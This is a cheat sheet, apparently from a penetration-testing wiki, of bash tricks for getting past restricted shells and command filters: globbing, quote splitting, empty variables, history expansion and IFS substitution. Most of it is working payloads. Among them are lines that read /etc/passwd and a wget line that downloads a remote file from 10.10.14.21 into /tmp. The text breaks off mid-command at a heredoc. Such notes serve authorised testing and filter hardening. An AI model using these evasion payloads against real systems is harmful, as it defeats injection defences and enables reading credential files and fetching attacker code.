# Bypass Bash Restrictions ## Bypass Paths and forbidden commands ```bash #Bash substitudes * fror any possible chat tha refers to a binary in the folder /usr/bin/p?ng #This equals /usr/bin/ping #Bash substitudes * fror any compatible combination with a binary in the folder /usr/bin/who*mi #This equals /usr/bin/whoami #[chars] /usr/bin/n[c] #/usr/bin/nc #Concatenatipn 'p'i'n'g #Equals to call ping "w"h"o"a"m"i \u\n\a\m\e \-\a #Uninitialized variables: A uninitialized variable equals to null (nothing) p${u}i${u}n${u}g #Equals to ping, use {} to put the uninitialized variables between valid characteres cat$u /etc$u/passwd$u #Use the uninitilized variable without {} before any symbol #Fake commands p$(u)i$(u)n$(u)g #Equals to ping but 3 errors trying to exeute "u" are shown w`u`h`u`o`u`a`u`m`u`i #Equals to whoami but 5 errors trying to exeute "u" are shown #Concating strings using history !-1 #This will be substitude by the last command executed, and !-2 by the penultimate command mi #This will throw an error whoa #This will throw an error !-1!-2 #This will execute whoami ``` ## Bypass forbidden spaces ```bash ##{form} {cat,lol.txt} #This will cat the file ##IFS - Internal field separator, change " " for any othe character ("]" in this case) #IFS withut modifications cat${IFS}/etc/passwd cat$IFS/etc/passwd #Put the command line in a variable and then execute it IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b IFS=];b=cat]/etc/passwd;$b #Using 2 ";" IFS=,;`cat<<